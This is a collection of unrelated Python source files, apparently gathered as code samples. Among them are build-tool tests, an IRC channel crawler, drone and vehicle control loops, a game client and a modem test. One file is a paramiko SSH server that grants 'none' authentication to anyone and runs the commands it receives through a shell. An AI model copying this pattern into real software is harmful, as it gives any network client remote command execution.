self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats))
self.assertTrue(RunTracker.post_stats(mk_url('/redirect307'), stats))
self.assertFalse(RunTracker.post_stats(mk_url('/redirect302'), stats))
server.shutdown()
server.server_close()
def test_write_stats_to_json_file(self):
# Set up
stats = {'stats': {'foo': 'bar', 'baz': 42}}
# Execute & verify
with temporary_file_path() as file_name:
RunTracker.write_stats_to_json(file_name, stats)
with open(file_name, 'r') as f:
result = json.load(f)
self.assertEqual(stats, result)
def test_create_dict_with_nested_keys_and_val(self):
keys = []
with self.assertRaises(ValueError):
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something')
keys += ['one']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': 'something'}
)
keys += ['two']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': 'something'}}
)
keys += ['three']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': 'something'}}}
)
keys += ['four']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': {'four': 'something'}}}}
)
def test_merge_list_of_keys_into_dict(self):
data = {}
keys = []
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something')
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', -1)
keys = ['key']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', 1)
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'O-N-E')
self.assertEqual(data, {'a': 'O-N-E'})
keys = ['one', 'two', 'three']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'T-H-R-E-E')
self.assertEqual(data, {'one': {'two': {'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A')
self.assertEqual(data, {'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['c', 'd', 'e', 'f']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'F-O-U-R')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['one', 'two', 'x', 'y']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'W-H-Y')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['c', 'd', 'e', 'g', 'h']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'H-E-L-L-O')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['one', 'two', 'x', 'z']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'Z-E-D')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['c', 'd', 'e', 'g', 'i']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'E-Y-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new O-N-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A-L-A')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A-L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a', 'b', 'c']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new A')
|
__init__.py
|
import sys
import socket
import threading
import subprocess
import errno
from pkg_resources import resource_string
import io
import paramiko
try:
import queue
except ImportError:
import Queue as queue
import logging
from .util import *
from .stream import *
class ServerInterface(paramiko.ServerInterface):
timeout = 10
def __init__(self, socket, server_key=None):
paramiko.ServerInterface.__init__(self)
self.queue = queue.Queue()
if server_key is None:
server_key = resource_string(__name__, 'server-key').decode('ascii')
server_key = paramiko.RSAKey(file_obj=io.StringIO(server_key))
else:
server_key = paramiko.RSAKey(filename=server_key)
self.transport = paramiko.Transport(socket)
self.transport.add_server_key(server_key)
self.transport.start_server(server=self)
def get_command(self):
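        # Wait up to `timeout` seconds for the (channel, command) tuple queued
        # by check_channel_exec_request; close the transport and return
        # (None, None) if the client never sends an exec request.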
try:
return self.queue.get(True, self.timeout)
except queue.Empty:
logging.error('Client passed no commands')
self.transport.close()
return None, None
except Exception as e:
self.transport.close()
raise e
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_channel_exec_request(self, channel, command):
self.queue.put((channel, command))
return True
class Proxy(ServerInterface):
def __init__(self, socket=None, username=None, server_key=None, **kwargs):
self.username = username
ServerInterface.__init__(self, socket or StdSocket(), server_key=server_key)
client, command = self.get_command()
if client:
self.relay_to_remote(client, command, username=self.username, **kwargs)
def relay_to_remote(self, client, command, *args, **kwargs):
self.remote = None
try:
self.remote = self.connect_to_remote(*args, **kwargs)
remote = self.remote.get_transport().open_session()
remote.exec_command(command)
pipe_streams(ChannelStream(client), ChannelStream(remote))
if remote.exit_status_ready():
status = remote.recv_exit_status()
client.send_exit_status(status)
finally:
client.close()
if self.remote:
self.remote.close()
self.transport.close()
@staticmethod
def connect_to_remote(host, port, username, host_key_check=True, **kwargs):
client = paramiko.SSHClient()
if host_key_check:
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logging.info('Connecting to ssh host %s@%s:%s ...', username, host, port)
client.connect(host, port, username=username, **kwargs)
return client
def check_auth_none(self, username):
self.username = username
return paramiko.AUTH_SUCCESSFUL
def get_allowed_auths(self, username):
return 'none'
class ProxyServer(Proxy):
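    # The client passes the remote endpoint in an SSH environment variable
    # named __HOST__; its value is parsed by parse_host_string() into
    # username, host and port before relaying the command.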
HOST = b'__HOST__'
def __init__(self, *args, **kwargs):
self.env = {}
Proxy.__init__(self, *args, **kwargs)
def check_channel_env_request(self, channel, key, value):
self.env[key] = value
return True
def relay_to_remote(self, *args, **kwargs):
username, host, port = parse_host_string(self.env[self.HOST].decode('utf-8'))
kwargs.update(username=username, host=host, port=port)
return super(ProxyServer, self).relay_to_remote(*args, **kwargs)
class Server(ServerInterface):
def __init__(self, socket, **kwargs):
ServerInterface.__init__(self, socket, **kwargs)
client, command = self.get_command()
if not client:
return
logging.info('Executing %r', command)
process = None
try:
process = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
pipe_streams(ChannelStream(client), ProcessStream(process))
if not client.closed:
client.send_exit_status(process.wait())
finally:
self.kill_process(process)
client.close()
self.transport.close()
def check_auth_none(self, username):
return paramiko.AUTH_SUCCESSFUL
def get_allowed_auths(self, username):
return 'none'
def kill_process(self, process):
if process:
process.stdout.close()
process.stdin.close()
process.stderr.close()
if process.poll() is None:
process.kill()
def run_server(host, port, worker=Server, **kwargs):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logging.debug('bind()')
sock.bind((host, port))
logging.debug('listen()')
    sock.listen(100)
    logging.info('Server started')
    threads = []
    try:
        while True:
            # drop threads whose connections have already closed
            threads = [t for t in threads if t.is_alive()]
            logging.debug('accept()')
client, address = sock.accept()
logging.info('Got a connection!')
thread = threading.Thread(target=worker, args=(client,), kwargs=kwargs)
thread.daemon = True
threads.append(thread)
thread.start()
except KeyboardInterrupt:
# stop server on ctrl+c
pass
finally:
sock.close()
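# Illustrative usage sketch (not part of the original module); host and port
# below are placeholders:
#
#   if __name__ == '__main__':
#       logging.basicConfig(level=logging.INFO)
#       run_server('127.0.0.1', 2222)                        # local exec server
#       # run_server('127.0.0.1', 2222, worker=ProxyServer)  # SSH relay mode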
|
pid_test.py
|
'''
Created on 12/04/2015
@author: david
'''
from math import sin, cos
import random
from threading import Thread
import time
from flight.stabilization.pid import PID
class SensorReader(object):
def __init__(self, readDelegate):
self._readDelegate = readDelegate
def readCurrentValue(self):
return self._readDelegate()
class ResultSetter(object):
def __init__(self, setResultDelegate):
self._setResultDelegate = setResultDelegate
def setResult(self, newValue):
self._setResultDelegate(newValue)
class SimulatedDrone(object):
def __init__(self):
random.seed()
self._accData = [0.0, 0.0]
self._accTarget = [0.0, 0.0]
#self._accZ = 0.0
#self._gyroZ = 0.0
self._motors = [0.0, 0.0, 0.0, 0.0]
self._sensorReaderX = SensorReader(self._readAccX)
self._sensorReaderY = SensorReader(self._readAccY)
self._resultSetterX = ResultSetter(self._setX)
self._resultSetterY = ResultSetter(self._setY)
self._pidAnglesSpeed = PID([0.1]*2, [0.1]*2, 0,[self._sensorReaderX,self._sensorReaderY], \
[self._resultSetterX, self._resultSetterY], [0]*2, 2)
self._pidAnglesSpeed.setTargets(self._accTarget)
self._printThread = Thread(target=self._printStatusDelegate)
self._isRunning = False
def _calculateAcc(self, motorPos1Id, motorPos2Id, motorNeg1Id, motorNeg2Id, accIndex, defect):
acc = self._motors[motorPos1Id] + self._motors[motorPos2Id] - self._motors[motorNeg1Id] - self._motors[motorNeg2Id]
self._accData[accIndex] = acc + defect
def _readAccX(self):
#self._accData[0] = self._accData[0] + random.uniform(-0.1, 0.1)
return self._accData[0]
def _readAccY(self):
#self._accData[1] = self._accData[1] + random.uniform(-0.01, 0.01)
return self._accData[1]
def _setMotor(self, motorId, increment):
newValue = self._motors[motorId] + increment
if newValue > 100.0:
newValue = 100.0
elif newValue < 0.0:
newValue = 0.0
self._motors[motorId] = newValue
def _setY(self, increment):
self._setMotor(0, -increment)
self._setMotor(3, -increment)
self._setMotor(1, increment)
self._setMotor(2, increment)
self._calculateAcc(1, 2, 0, 3, 1, 0.0)
def _setX(self, increment):
self._setMotor(0, -increment)
self._setMotor(1, -increment)
self._setMotor(2, increment)
self._setMotor(3, increment)
self._calculateAcc(2, 3, 0, 1, 0, 0.5)
def _printStatusDelegate(self):
while self._isRunning:
print "Accel :{0}; Motors:{1})".format(self._accData, self._motors)
time.sleep(1)
def addThrottle(self, increment):
for motorId in range(4):
self._motors[motorId] = self._motors[motorId] + increment
def shift(self, angle, radius):
acc = 0.1 * radius / 100.0
xacc = sin(angle) * acc
yacc = cos(angle) * acc
self._accTarget[0] = xacc
self._accTarget[1] = yacc
self._pidAnglesSpeed.setTargets(self._accTarget)
print "Target: {0}".format(self._accTarget)
def start(self):
self._isRunning = True
self._printThread.start()
self._pidAnglesSpeed.start()
def stop(self):
self._isRunning = False
self._pidAnglesSpeed.stop()
self._pidAnglesSpeed.join()
self._printThread.join()
if __name__ == '__main__':
drone = SimulatedDrone()
drone.start()
done = False
while not done:
        command = input("Command? >").strip().split()
command0 = command[0]
if command0 == "Q":
done = True
elif command0 == "T":
increment = float(command[1])
drone.addThrottle(increment)
elif command0 == "S":
angle = float(command[1])
increment = float(command[2])
drone.shift(angle, increment)
print "Finishing..."
drone.stop()
print "Goodbye!"
|
irc.py
|
# IRC Crawler
# Jimmy Trimer
import socket
import time
import datetime
import threading
#from darkweb.modules.base
from darkweb.modules.base.crawler import Crawler
from darkweb.modules.base.result import *
from darkweb.modules.base.crawlerconfig import *
#from crawler import Crawler
#from result import *
#from crawlerconfig import *
class IRC(Crawler):
    def __init__(self, config, nickname="aaabbbcccddd", mins_interval=10, total_mins=60):
self.config = config
self.server = config.location
self.channels = []
self.num_channels = None
if "nickname" in config.options.keys():
self.nickname = config.options["nickname"]
else:
self.nickname = nickname
if "mins_interval" in config.options.keys():
self.mins_interval = int(config.options["mins_interval"])
else:
self.mins_interval = mins_interval
if "total_mins" in config.options.keys():
self.total_mins = int(config.options["total_mins"])
else:
self.total_mins = total_mins
if "channels" in config.options.keys():
for channel in config.options["channels"].split(","):
self.channels.append(channel)
self.num_channels = len(self.channels)
# self.channel = config.options["channel"]
        if self.num_channels is None:
if "num_channels" in config.options.keys():
self.num_channels = int(config.options['num_channels'])
else:
self.num_channels = 1
# self.connect()
# self.channels = self.getChannels()
# self.channels = []
self.run(self.channels)
def connect(self):
self.irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to server... %s" % self.server)
self.irc.connect((self.server, 6667))
self.irc.send("USER " + self.nickname + " " + self.nickname + " " + self.nickname + " :" + self.nickname
+ " \n")
self.irc.send("NICK " + self.nickname + "\n")
while(True):
print("looking for motd")
temp = self.irc.recv(2048)
if(temp == "" or temp == None or temp == "-1"):
break
if("/MOTD" in temp):
break
print("Connected to %s!" % self.server)
return
# close irc connection
def close(self):
self.irc.close()
return
# join an irc channel
# must be connected to server first
def joinChannel(self, channel):
self.channel = channel
self.irc.send("JOIN " + self.channel + "\n")
return
# Recv data from irc server
def get_text(self):
text = self.irc.recv(2048)
if text.find('PING') != -1:
self.irc.send('PONG ' + text.split()[1] + "\r\n")
return ""
return text
# return list of channels from server
def getChannels(self):
print("Getting Channels..."),
self.irc.send("LIST\n")
data = ""
while(True):
d = self.irc.recv(2048)
data += d
if(d == "" or d == None or d == "-1"):
break
if("End of /LIST" in d):
break
channels = []
data_split = data.split("\n")
for line in data_split:
if "322" in line:
channel = line.split(" ")[3]
channels.append(channel)
return channels
# def doCrawl(self, mins_interval, total_mins, crawler_config, channel):
def doCrawl(self, channel=None):
session_text = ""
finished = False
i = 0
self.connect()
self.joinChannel(channel)
print("Starting to listen... %s" % channel)
start_time_total = time.time()
start_time = time.time()
cur_time = time.time()
while(not finished):
#print("cur_time: %d total_time: %d" % ((cur_time - start_time), (cur_time - start_time_total)))
text = self.get_text()
#print("Text: %s" % text)
if text != "":
#print(session_text)
session_text += (text+"\n")
cur_time = time.time()
#print(self.mins_interval*60)
if((cur_time - start_time) >= self.mins_interval*60):
print("="*80)
# print(session_text)
utc_start_time = datetime.datetime.fromtimestamp(start_time).strftime('%Y-%m-%d %H:%M:%S')
utc_cur_time = datetime.datetime.fromtimestamp(cur_time).strftime('%Y-%m-%d %H:%M:%S')
print("Start time: %s End time: %s %s" % (utc_start_time, utc_cur_time, channel))
result = Result(self.config, utc_start_time, utc_cur_time, (self.server, channel), "", session_text)
self.send_result(result)
session_text = ""
start_time = time.time()
if((cur_time - start_time_total) >= self.total_mins*60):
finished = True
print("finished = True")
return
# run each crawl in a thread
def run(self, channels):
print(channels)
if len(channels) == 0:
self.connect()
channels = self.getChannels()
self.close()
for i in range(0, self.num_channels):
print("running %s" % channels[i])
t = threading.Thread(target=self.doCrawl, args=(channels[i], ))
t.start()
return
if __name__ == "__main__":
options = { 'mins_interval': "1",
'total_mins': "2",
'num_channels': "1",
# 'channels': "security,linux,information-node"
'channels': "##linux",
'nickname': "tnasty11"
}
config = CrawlerConfig("irc.freenode.net", "IRC", "", "","", options)
irc = IRC(config)
print("Done")
|
azync.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
__all__ = ['await_callback']
class ThreadExceptHookHandler(object):
"""Workaround to deal with a bug in the Python interpreter (!).
Report: http://bugs.python.org/issue1230540
Discussion: https://stackoverflow.com/a/31622038/269335
PR (not yet merged): https://github.com/python/cpython/pull/8610
Disclaimer (!): https://news.ycombinator.com/item?id=11090814
"""
def __enter__(self):
original_init = threading.Thread.__init__
def init(self, *args, **kwargs):
original_init(self, *args, **kwargs)
original_run = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
original_run(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
self._original_init = original_init
threading.Thread.__init__ = init
return self
def __exit__(self, *args):
threading.Thread.__init__ = self._original_init
def await_callback(async_func, callback_name='callback', errback_name=None, *args, **kwargs):
"""Wait for the completion of an asynchronous code that uses callbacks to signal completion.
This helper function turns an async function into a synchronous one,
waiting for its completion before moving forward (without doing a busy wait).
It is useful to minimize "callback hell" when more advanced options
like ``asyncio`` are not available.
Parameters
----------
async_func : callable
An asynchronous function that receives at least one callback parameter
to signal completion.
callback_name : string, optional
Name of the callback parameter of ``async_func``.
Default is `callback`.
errback_name : string, optional
Name of the error handling callback parameter of ``async_func``.
Default is None.
Notes
-----
Exceptions thrown during the async execution are handled and re-thrown as normal
exceptions, even if they were raised on a different thread.
Examples
--------
The following example shows how to await an async function (``do_sync_stuff`` in
the example), using this utility:
.. code-block:: python
from compas.utilities import await_callback
def do_async_stuff(callback):
from threading import Thread
def runner(cb):
print('doing async stuff')
# ..
cb('done')
Thread(target=runner, args=(callback, )).start()
result = await_callback(do_async_stuff)
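    If the async function also takes an error callback, pass its parameter name
    via ``errback_name`` so that failures are re-raised here. A minimal sketch,
    assuming a hypothetical ``do_async_stuff`` with an ``errback`` parameter:
    .. code-block:: python
        def do_async_stuff(callback, errback):
            from threading import Thread
            def runner(cb, eb):
                try:
                    cb('done')          # report success
                except Exception as e:
                    eb(e)               # report failure
            Thread(target=runner, args=(callback, errback)).start()
        result = await_callback(do_async_stuff, errback_name='errback')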
"""
wait_event = threading.Event()
call_results = {}
def inner_callback(*args, **kwargs):
try:
call_results['args'] = args
call_results['kwargs'] = kwargs
wait_event.set()
except Exception as e:
call_results['exception'] = e
wait_event.set()
    kwargs[callback_name] = inner_callback
if errback_name:
def inner_errback(error):
if isinstance(error, Exception):
call_results['exception'] = error
else:
call_results['exception'] = Exception(str(error))
wait_event.set()
kwargs[errback_name] = inner_errback
def unhandled_exception_handler(type, value, traceback):
call_results['exception'] = value
wait_event.set()
try:
        # Install unhandled exception handler
sys.excepthook = unhandled_exception_handler
# Invoke async method and wait
with ThreadExceptHookHandler():
async_func(*args, **kwargs)
wait_event.wait()
finally:
        # Restore built-in unhandled exception handler
sys.excepthook = sys.__excepthook__
if 'exception' in call_results:
raise call_results['exception']
return_value = call_results['args']
dict_values = call_results['kwargs']
if not dict_values:
# If nothing, then None
if len(return_value) == 0:
return None
# If it's a one-item tuple,
# un-wrap from it and return that element
elif len(return_value) == 1:
return return_value[0]
else:
return return_value
if not return_value:
return dict_values
return return_value + (dict_values,)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
|
vehicle.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
import time
from statistics import median
from threading import Thread
from prettytable import PrettyTable
try:
from ROAR.ROAR_Jetson.memory import Memory
except:
from memory import Memory
class PartProfiler:
def __init__(self):
self.records = {}
def profile_part(self, p):
self.records[p] = {"times": []}
def on_part_start(self, p):
self.records[p]['times'].append(time.time())
def on_part_finished(self, p):
now = time.time()
prev = self.records[p]['times'][-1]
delta = now - prev
thresh = 0.000001
if delta < thresh or delta > 100000.0:
delta = thresh
self.records[p]['times'][-1] = delta
def report(self):
print("Part Profile Summary: (times in ms)")
pt = PrettyTable()
pt.field_names = ["part", "max", "min", "avg", "median"]
for p, val in self.records.items():
            # remove first and last entry because there could be one-off
# time spent in initialisations, and the latest diff could be
# incomplete because of user keyboard interrupt
arr = val['times'][1:-1]
if len(arr) == 0:
continue
pt.add_row([p.__class__.__name__,
"%.2f" % (max(arr) * 1000),
"%.2f" % (min(arr) * 1000),
"%.2f" % (sum(arr) / len(arr) * 1000),
"%.2f" % (median(arr) * 1000)])
print(pt)
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
self.profiler = PartProfiler()
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
        outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
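        Example
        -------
        A minimal sketch; ``CameraPart`` and the channel name are hypothetical::
            v = Vehicle()
            v.add(CameraPart(), outputs=['cam/image'], threaded=True)
            v.start(rate_hz=20, max_loop_count=100)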
"""
assert type(inputs) is list, "inputs is not a list: %r" % inputs
assert type(outputs) is list, "outputs is not a list: %r" % outputs
assert type(threaded) is bool, "threaded is not a boolean: %r" % threaded
p = part
print('Adding part {}.'.format(p.__class__.__name__))
entry = {}
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
self.profiler.profile_part(part)
def remove(self, part):
"""
        remove part from list
"""
self.parts.remove(part)
def start(self, rate_hz=10, max_loop_count=None, verbose=False):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinite loop
that runs each part and updates the memory.
Args:
            verbose: If True, print loop-rate warnings and periodic profiler reports.
rate_hz : int, The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int, Maximum number of loops the drive loop should execute. This is
used for testing that all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread
entry.get('thread').start()
# wait until the parts warm up.
print('Starting vehicle...')
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
                # stop drive loop if loop_count exceeds max_loop_count
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
else:
# print a message when could not maintain loop rate.
if verbose:
print('WARN::Vehicle: jitter violation in vehicle loop with value:', abs(sleep_time))
if verbose and loop_count % 200 == 0:
self.profiler.report()
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self, new_throttle: float = 0, new_steering: float = 0):
"""
loop over all parts
"""
for entry in self.parts:
run = True
# check run condition, if it exists
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
if run:
# get part
p = entry['part']
# start timing part run
self.profiler.on_part_start(p)
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
# finish timing part run
self.profiler.on_part_finished(p)
def stop(self):
print('\n\nShutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except AttributeError:
# usually from missing shutdown method, which should be optional
pass
except Exception as e:
print(e)
self.profiler.report()
|
game-client.py
|
import socket
import threading
import subprocess
class Client:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
message = ""
server_address = 0
player_number = 0
def welcome(self):
print("Welcome, please enter the address of the connection you want to reach")
try:
address = input("Address: ")
port = input("Port: ")
print("Connecting to "+address+":"+port+"...")
return (address, int(port))
except:
return ("0.0.0.0",0)
def send_message(self):
while True:
self.message = input("Message: ")
self.s.sendall(self.message.encode())
if self.message=="quit":
break
def game_process(self):
subprocess.call(["./connect4"])
def __init__(self):
self.server_address = self.welcome()
thread = threading.Thread(target=self.game_process)
thread.daemon = True
thread.start()
def connect(self):
try:
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(self.server_address)
except:
print("An error has ocurred")
#First message recieved from the server is the player number
self.player_number = self.s.recv(2048).decode()
subprocess.call(["./writer", player_number])
thread = threading.Thread(target=self.send_message)
thread.daemon = True
thread.start()
while True:
server_message = self.s.recv(2048).decode()
if not server_message:
break
subprocess.call(["./writer",server_message])
if self.message=="quit":
break
self.s.close()
client = Client()
client.connect()
|
videoovercrow.py
|
#!/usr/bin/env python3
import io
import numpy as np
import cv2
from PIL import Image
import pycrow as crow
import threading
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 320)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 240)
cap.set(cv2.CAP_PROP_SATURATION, 0.2)
crow.create_udpgate(12, 10011)
addr = ".12.127.0.0.1:10009"
crow.set_crowker(addr)
caddr = crow.compile_address(addr)
#crow.diagnostic_enable()
thr = threading.Thread(target=crow.spin, args=())
thr.start()
while(True):
ret, frame = cap.read()
jpg = Image.fromarray(frame)
tmpFile = io.BytesIO()
jpg.save(tmpFile,'JPEG')
tmpFile.seek(0)
data = tmpFile.read()
# print(data[-40:-1])
crow.publish(caddr, "video_stream", data, 0, 200)
cap.release()
cv2.destroyAllWindows()
|
poor_mans_profiler_gdb.py
|
import threading
import time
import signal
import os
debug = True
gdb.execute('set pagination 0')
def log(*msg):
if debug:
print(*msg)
def pause_after_sec(secs, end):
global pausestart
log("Thread starting. Stopping after %ss" % secs)
time.sleep(end-time.time())
# stop running gdb by sending sigint
pausestart = time.time()
os.kill(os.getpid(), signal.SIGINT)
log("Thread finishing")
def get_bt_and_pause(secs):
global pauses
gdb.execute('bt')
log("\nContinuing Execution for a while. Starting watchdog.")
thread = threading.Thread(target=pause_after_sec, args=(secs,time.time()+secs))
thread.start()
log("Resuming Process.")
gdb.execute("continue")
log("Joining Thread. Should not be necessary, since gdb is stopped only when thread is finished")
thread.join()
pauses = 0
pausestart = time.time()
for i in range(1,1000):
get_bt_and_pause(1)
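# Usage sketch (an assumption, not from the original script): run this file inside
# gdb's Python interpreter, e.g. attached to a running process:
#
#   gdb -p <pid> -x poor_mans_profiler_gdb.py
#
# Each iteration prints a backtrace, lets the inferior run for about a second via
# the watchdog thread, then interrupts it again with SIGINT.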
|
example_test.py
|
from __future__ import unicode_literals
from tiny_test_fw import Utility
import os
import serial
import threading
import time
import ttfw_idf
class SerialThread(object):
'''
Connect to serial port and fake responses just like from a real modem
'''
# Dictionary for transforming received AT command to expected response
AT_FSM = {b'AT+CGMM': b'0G Dummy Model',
b'AT+CGSN': b'0123456789',
b'AT+CIMI': b'ESP',
b'AT+COPS?': b'+COPS: 0,0,"ESP Network"',
b'AT+CSQ': b'+CSQ: 4,0',
b'AT+CBC': b'+CBC: 0,50',
b'ATD*99***1#': b'CONNECT',
}
def run(self, log_path, exit_event):
with serial.Serial(self.port, 115200) as ser, open(log_path, 'w') as f:
buff = b''
while not exit_event.is_set():
time.sleep(0.1)
buff += ser.read(ser.in_waiting)
if not buff.endswith(b'\r'):
continue # read more because the complete command wasn't yet received
cmd_list = buff.split(b'\r')
buff = b''
for cmd in cmd_list:
if len(cmd) == 0:
continue
snd = self.AT_FSM.get(cmd, b'')
if snd != b'':
snd += b'\n'
snd += b'OK\n'
f.write('Received: {}\n'.format(repr(cmd.decode())))
f.write('Sent: {}\n'.format(repr(snd.decode())))
ser.write(snd)
def __init__(self, port, log_path):
self.port = port
self.exit_event = threading.Event()
self.t = threading.Thread(target=self.run, args=(log_path, self.exit_event,))
self.t.start()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.exit_event.set()
self.t.join(60)
if self.t.is_alive():
Utility.console_log('The serial thread is still alive', 'O')
@ttfw_idf.idf_example_test(env_tag='Example_PPP')
def test_examples_pppos_client(env, extra_data):
rel_project_path = 'examples/protocols/pppos_client'
dut = env.get_dut('pppos_client', rel_project_path)
project_path = os.path.join(dut.app.get_sdk_path(), rel_project_path)
modem_port = '/dev/ttyUSB{}'.format(0 if dut.port.endswith('1') else 1)
with SerialThread(modem_port, os.path.join(project_path, 'serial.log')):
dut.start_app()
dut.expect_all('pppos_example: Module: 0G Dummy Model',
'pppos_example: Operator: "ESP Network"',
'pppos_example: IMEI: 0123456789',
'pppos_example: IMSI: ESP',
'pppos_example: rssi: 4, ber: 0',
'pppos_example: Battery voltage: 0 mV',
'pppos_example: Modem PPP Started',
timeout=60)
cmd = ('pppd {} 115200 10.0.0.1:10.0.0.2 logfile {} local noauth debug nocrtscts nodetach +ipv6'
''.format(modem_port, os.path.join(project_path, 'ppp.log')))
with ttfw_idf.CustomProcess(cmd, '/dev/null'): # Nothing is printed here
dut.expect_all('pppos_example: Modem Connect to PPP Server',
'pppos_example: IP : 10.0.0.2',
'pppos_example: Netmask : 255.255.255.255',
'pppos_example: Gateway : 10.0.0.1',
'pppos_example: Name Server1: 0.0.0.0',
'pppos_example: Name Server2: 0.0.0.0',
'pppos_example: GOT ip event!!!',
'pppos_example: MQTT other event id: 7',
# There are no fake DNS server and MQTT server set up so the example fails at this point
'TRANS_TCP: DNS lookup failed err=202 res=0x0',
'MQTT_CLIENT: Error transport connect',
'pppos_example: MQTT_EVENT_ERROR',
'pppos_example: MQTT_EVENT_DISCONNECTED')
if __name__ == '__main__':
test_examples_pppos_client()
|
headless.py
|
"""
A simple voice-enabled client that has no user interface. It currently supports
